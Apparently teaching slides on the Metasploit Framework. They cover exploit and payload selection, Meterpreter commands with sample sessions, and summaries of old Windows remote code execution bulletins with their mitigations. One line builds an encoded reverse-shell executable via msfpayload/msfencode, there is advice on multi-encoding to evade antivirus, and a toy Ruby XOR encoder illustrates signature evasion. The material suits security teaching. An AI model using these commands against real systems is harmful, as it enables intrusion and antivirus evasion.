• "The Metasploit Framework is an advanced open-source platform for attacking, testing, and using exploit code."
• Metasploit helps security and IT professionals identify security issues and verify vulnerabilities in a system.
• Perform penetration tests:
  – Overt penetration testing
  – Covert penetration testing
• Consists of tools, libraries, modules, and user interfaces. These are configured and combined to launch an exploit.
• Written in Ruby.
• Professional approach to penetration testing:
  – Automation
  – Reconnaissance, exploitation
• All-in-one solution:
  – Multi-platform
  – Diverse range of target applications
• Open source:
  – Custom payloads
• Choose an exploit module:
  – show exploits: list the exploits available within the framework
  – use exploit_name: select the exploit
  – info exploit_name: view information about the exploit
• Choose a payload:
  – show payloads: show only the payloads that are compatible with the chosen module
  – info payload_name: view detailed information about the payload
  – set payload payload_name: select the payload
• Configure the chosen exploit and payload:
  – show options: view the options you must configure
  – set option_name value: configure an option
  – show advanced: show the advanced options
  – check: verify that the options are set correctly and that the target appears vulnerable, without launching the exploit
  – show targets: list the target variants (platform, version, service pack) the exploit supports
  – set TARGET value: choose a target
  – exploit: launches the exploit and attempts to compromise the target
Meterpreter, short for the Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex commands for exploiting and attacking a remote machine. It accomplishes this by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on the target computer after exploitation has occurred.
• Fs: provides interaction with the filesystem on the remote machine.
• Net: provides interaction with the network stack on the remote machine.
• Process: provides interaction with processes on the remote machine.
• Sys: provides interaction with the environment on the remote machine.
• screenshot: capture the desktop screen of the victim
• sysinfo: view information about the victim's platform, for example:

    meterpreter > sysinfo
    Computer: IHAZSECURITY
    OS      : Windows XP (Build 2600, Service Pack 2).
    Arch    : x86
    Language: en_US
• execute: executes a process on the remote endpoint
• kill: terminate one or more processes on the remote endpoint
• ps: list processes on the remote endpoint
Example session: execute launches cmd.exe with a channel attached (-c), and interact switches the console to that channel:

    meterpreter > execute -f cmd -c
    execute: success, process id is 3516.
    execute: allocated channel 1 for new process.
    meterpreter > interact 1
    interact: Switching to interactive console on 1...
    interact: Started interactive channel 1.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS>ipconfig
• Encoding a payload with msfencode:

    root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe

  (msfpayload and msfencode have since been merged into msfvenom, which takes the payload name, -e for the encoder, -i for the number of encoding iterations and -f for the output format.)
• Multi-encoding: allows the payload to be encoded several times to throw off antivirus programs.
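What encoding changes for a byte-signature scanner, as an added example that is not from the slides or from Metasploit: a toy XOR encoder whose decoder stub is a constructed marker rather than executable code (x86/shikata_ga_nai is far more involved). It shows that a signature on the original payload body stops matching after one round, that the outermost stub still sits in the clear after multi-encoding (which is why detection anchors on decoder stubs rather than the body, and why real encoders randomise them), and that the rounds decode back losslessly.

```ruby
# Added example, not from the slides or from Metasploit: a toy XOR "encoder"
# to show what encoding changes for a byte-signature scanner. STUB_MARKER is a
# constructed placeholder for the decoder stub a real encoder prepends; it is
# not executable code, and x86/shikata_ga_nai is far more involved than this.
STUB_MARKER = "\xDE\xC0\xDE".b.freeze

# One encoding round: [stub marker][1-byte key][body XOR key].
def encode_round(body, key)
  raise ArgumentError, "key must be 0..255" unless (0..255).cover?(key)
  STUB_MARKER + key.chr + body.bytes.map { |b| b ^ key }.pack("C*")
end

# Reverse one round: read the key that follows the stub and XOR the body back.
def decode_round(blob)
  raise ArgumentError, "no stub marker" unless blob.start_with?(STUB_MARKER)
  key = blob.getbyte(STUB_MARKER.bytesize)
  blob.byteslice(STUB_MARKER.bytesize + 1..-1).bytes.map { |b| b ^ key }.pack("C*")
end

# Multi-encoding: several rounds, innermost key first; decoding strips them outermost first.
def multi_encode(body, keys)
  keys.reduce(body) { |acc, k| encode_round(acc, k) }
end

def multi_decode(blob, rounds)
  rounds.times.reduce(blob) { |acc, _| decode_round(acc) }
end

# Naive scanner: does a fixed byte pattern occur anywhere in the file?
def signature_hit?(blob, pattern)
  !blob.b.index(pattern.b).nil?
end

# Constructed stand-in for a payload body, and a signature taken from it.
SAMPLE_PAYLOAD = "\x90\x90MARKER\x31\xC0".b.freeze
PAYLOAD_SIG    = "MARKER".b.freeze

# What the scanner sees before and after encoding.
def demo
  once   = encode_round(SAMPLE_PAYLOAD, 0x5A)
  thrice = multi_encode(SAMPLE_PAYLOAD, [0x5A, 0xA7, 0x13])
  {
    body_sig_hits_plain:   signature_hit?(SAMPLE_PAYLOAD, PAYLOAD_SIG), # true
    body_sig_hits_encoded: signature_hit?(once, PAYLOAD_SIG),           # false: body bytes changed
    body_sig_hits_thrice:  signature_hit?(thrice, PAYLOAD_SIG),         # false
    stub_sig_hits_thrice:  signature_hit?(thrice, STUB_MARKER),         # true: outer stub in the clear
    roundtrip_ok:          multi_decode(thrice, 3) == SAMPLE_PAYLOAD,   # true
  }
end
```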
• Vulnerability in Server Service Could Allow Remote Code Execution (958644)
• The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code.
• Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter.
• http://technet.microsoft.com/en-us/security/bulletin/ms08-067
LSASS Vulnerability - CAN-2003-0533
Impact of vulnerability: Remote Code Execution
An attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges.
This vulnerability is caused by an unchecked buffer in the LSASS service.
• This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts.
• Systems are only vulnerable to remote attack when sharing a printer and the remote attacker can access the printer share.
• This vulnerability is caused when the Windows Print Spooler insufficiently restricts user permissions to access print spoolers.
• Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.
• http://technet.microsoft.com/en-us/security/bulletin/MS10-061
• This vulnerability is caused by the Windows RPCSS service not properly checking message inputs under certain circumstances. After establishing a connection, an attacker could send a specially crafted, malformed RPC message to cause the underlying Distributed Component Object Model (DCOM) process on the remote system to fail in such a way that arbitrary code could be executed.
• To exploit this vulnerability, the attacker would require the ability to send a specially crafted request to port 135, 139, 445 or 593, or to any other specifically configured RPC port on the remote machine.
• Best practices recommend blocking all TCP/IP ports that are not actually being used.
• A remote code execution vulnerability exists in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.
• http://technet.microsoft.com/en-us/security/bulletin/MS08-041